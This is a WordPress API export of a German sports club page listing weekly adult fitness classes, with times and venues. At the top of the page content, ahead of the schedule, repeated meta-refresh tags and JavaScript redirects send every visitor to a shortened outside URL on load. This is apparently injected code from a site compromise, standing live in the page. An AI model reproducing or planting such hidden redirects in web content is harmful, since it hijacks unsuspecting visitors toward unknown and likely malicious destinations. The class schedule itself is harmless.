{"id":245,"date":"2016-08-27T15:35:09","date_gmt":"2016-08-27T13:35:09","guid":{"rendered":"https:\/\/vfloberbieber.de\/home\/?page_id=245"},"modified":"2023-05-01T21:32:16","modified_gmt":"2023-05-01T19:32:16","slug":"angebote-fuer-erwachsene","status":"publish","type":"page","link":"https:\/\/vfloberbieber.de\/home\/angebote-fuer-erwachsene\/","title":{"rendered":"Angebote f\u00fcr Erwachsene"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/lTxoCRded0r4\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/lTxoCRded0r4\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/lTxoCRded0r4\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/lTxoCRded0r4\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/lTxoCRded0r4\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/lTxoCRded0r4\";<\/script><\/p>\n<figure>\n\t\t\t\t\t\t\t\t\t\t<img src=\"https:\/\/vfloberbieber.de\/home\/wp-content\/uploads\/2016\/08\/turnen_erw_2016.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/vfloberbieber.de\/home\/wp-content\/uploads\/2016\/08\/turnen_erw_2016.jpg 640w, https:\/\/vfloberbieber.de\/home\/wp-content\/uploads\/2016\/08\/turnen_erw_2016-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" width=\"640\" height=\"480\"><figcaption>Angebote f\u00fcr Erwachsene<\/figcaption><\/figure>\n<p><strong>Montags<\/strong><\/p>\n<ul>\n<li>Rehasport Orthop\u00e4die von 17.00 bis 18.00 Uhr im B\u00fcrgerhaus<\/li>\n<li>Step-Aerobic von 18.15 bis 19.05 Uhr im B\u00fcrgerhaus<\/li>\n<li>Fitnesstraining-Stabile K\u00f6rpermitte &nbsp;von 19.10 bis 20.00 Uhr im B\u00fcrgerhaus<\/li>\n<li>Funktionelle Gymnastik von 20.00 bis 21.30 Uhr im B\u00fcrgerhaus<\/li>\n<\/ul>\n<p><strong>Dienstags<\/strong><\/p>\n<ul>\n<li>Gymnastik mit Musik von 09.30 bis 10.30 Uhr im B\u00fcrgerhaus<\/li>\n<\/ul>\n<p><strong>Mittwochs<\/strong><\/p>\n<ul>\n<li>REHA Sport bei Osteoporose von 10.30 bis 11.30 Uhr im B\u00fcrgerhaus<\/li>\n<li>Bauch, Beine, Po von 18.00 bis 19.00 Uhr im B\u00fcrgerhaus<\/li>\n<li>ZUMBA mit Bine und HW von<strong>&nbsp;<\/strong>19.00 bis 20.00 Uhr im B\u00fcrgerhaus<\/li>\n<li>BAUCHTANZ im Kurssystem von 20.00 &#8211; 21.30 Uhr im B\u00fcrgerhaus<\/li>\n<\/ul>\n<p><strong>Donnerstags<\/strong><\/p>\n<ul>\n<li>Walking ab 18.00 Uhr am Ampel Walking Treffpunkt<\/li>\n<\/ul>\n<p><strong>Freitags<\/strong><\/p>\n<ul>\n<li>REHA Sport in der Krebsnachsorge im WINTER von 15.00 bis 16.00 Uhr (telefonisch Anmeldung bei Stefanie R\u00e4mer)<\/li>\n<li>B\u00fcrgerhaus\/Natur im SOMMER von 16.00 bis 17.00 Uhr an wechselnden Pl\u00e4tze<\/li>\n<\/ul>\n<p><strong>Samstags<\/strong><\/p>\n<ul>\n<li>Walking ab 01.10.2018 wieder&nbsp;<strong>09.00<\/strong>&nbsp;Uhr Treffpunkt am Stausee<\/li>\n<\/ul>\n<p style=\"text-align: center;\">ACHTUNG: Die Zeiten der Walking-Gruppe am Donnerstag k\u00f6nnen variieren; bitte voher nachfragen!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Angebote f\u00fcr Erwachsene Montags Rehasport Orthop\u00e4die von 17.00 bis 18.00 Uhr im B\u00fcrgerhaus Step-Aerobic von 18.15 bis 19.05 Uhr im B\u00fcrgerhaus Fitnesstraining-Stabile K\u00f6rpermitte &nbsp;von 19.10 bis 20.00 Uhr im B\u00fcrgerhaus Funktionelle Gymnastik von 20.00 bis 21.30 Uhr im B\u00fcrgerhaus Dienstags Gymnastik mit Musik von 09.30 bis 10.30 Uhr im B\u00fcrgerhaus [&hellip;]<\/p>\n","protected":false},"author":31,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/pages\/245"}],"collection":[{"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/users\/31"}],"replies":[{"embeddable":true,"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/comments?post=245"}],"version-history":[{"count":10,"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/pages\/245\/revisions"}],"predecessor-version":[{"id":6690,"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/pages\/245\/revisions\/6690"}],"wp:attachment":[{"href":"https:\/\/vfloberbieber.de\/home\/wp-json\/wp\/v2\/media?parent=245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}